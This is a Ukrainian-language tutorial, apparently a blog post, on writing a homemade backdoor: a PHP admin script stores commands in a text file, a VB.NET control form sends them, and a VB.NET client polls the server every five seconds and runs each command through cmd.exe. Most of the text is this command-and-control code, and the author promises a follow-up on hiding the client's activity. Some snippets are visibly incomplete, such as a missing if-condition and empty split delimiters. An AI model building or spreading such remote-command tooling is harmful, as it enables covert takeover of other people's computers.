Всім привіт) Як ви вже помітили, сьогодні розповім як написати свій бекдор “на будь-якій мові” (Якщо ви вмієте писати програми і у вас є фантазія).
Отже почнемо з того, що нам спочатку треба зробити в’язку адмінка-клієнт. Для цього ми використовуємо PHP , і всього лише 5 рядків коду)
{
$cmd = fopen(‘cmd.txt’, ‘w+’); //Створюємо порожній файл, якщо існує такий очищаємо його.
fwrite($cmd, $_GET[‘cmd’]); //пхаємо те, що в параметрі “cmd”, а там як ми пам’ятаємо було “msg(HelloWorld!)”
fclose($cmd); //закриваємо за собою файл
}
else
{
$cmd = fopen(“cmd.txt”, “w”); //Створюємо новий файл (тобто очищаємо наш cmd.txt)
fclose($cmd); //закриваємо за собою файл
}
Цей код я десь спиздил знайшов на просторах інтернету.
Даний код буде залишати команди для нашого бекдор)
Отже приступимо до адмінки, спочатку набросаєм на формі кнопку і текстбокс, і веббраузер, який я заліз на другу, форму, щоб він мені не заважав)
Далі перейдемо до коду
Вказуємо наш сайт, щоб він завантажувався при запуску програми) і оголошуємо його глобальної змінної
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
www = “http://localhost/”
End Sub
Оживимо кнопку, де ми говоримо передати GET запит на нашу адмінку на сайті, після cmd= наша команда) тег msg згодом потрібен буде для обробки клієнтом.
Form2.WebBrowser1.Navigate(www & “rat/admin.php?cmd=< msg>” & TextBox1.Text & “< /msg>“)
TextBox1.Text = “”
End Sub
Наша адмінка готова)
Перейдемо до клієнта) нічого не кидаємо на форму, крім таймера)
Давайте пропишемо роботу таймера за яким наша програма буде перевіряти сайт (файл cmd.txt) ну і звичайно таймер запускається разом з програмою)) Так само як і в адмінці, оголосимо глобальні змінні, тепер їх дві, а ще нам потрібно підключити дві бібліотеки
Imports System.IO
Public WC As New System.Net.WebClient
Public www As String
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
www = “http://localhost/”
Timer1.Enabled = True
Timer1.Interval = 5000
End Sub
Для зручності я зробив штучну затримку
Ну і тепер код самого таймера, тобто те, що має статися ) Спочатку отпарсим наші дані) для цього ми і вказували тег msg , ну а далі командою Shell запускаємо командний рядок із зазначеними командами)
Dim R() As String = {“”}
Dim L() As String = {“”}
Dim myHttpWebRequest As Net.HttpWebRequest = Net.HttpWebRequest.Create(www & “rat/cmd.txt”)
Dim myHttpWebResponse As Net.HttpWebResponse = myHttpWebRequest.GetResponse()
Dim myStreamReader As New IO.StreamReader(myHttpWebResponse.GetResponseStream, System.Text.Encoding.GetEncoding(1251))
Dim Str As String = myStreamReader.ReadToEnd()
If InStr(Str, R(0)) 0 Then
Dim Tmp As String = Str.Split(R, StringSplitOptions.None)(1)
Dim Res As String = Tmp.Split(L, StringSplitOptions.None)(0)
WC.DownloadString(www & “rat/admin.php?cmd=clear_cmd”)
Wait(2)
Shell(“cmd.exe “ + Res)
Else
End If
End Sub
P. S. якщо вам цікава ця стаття, то наступного разу я зроблю статтю про те, як приховати дії нашого клієнта.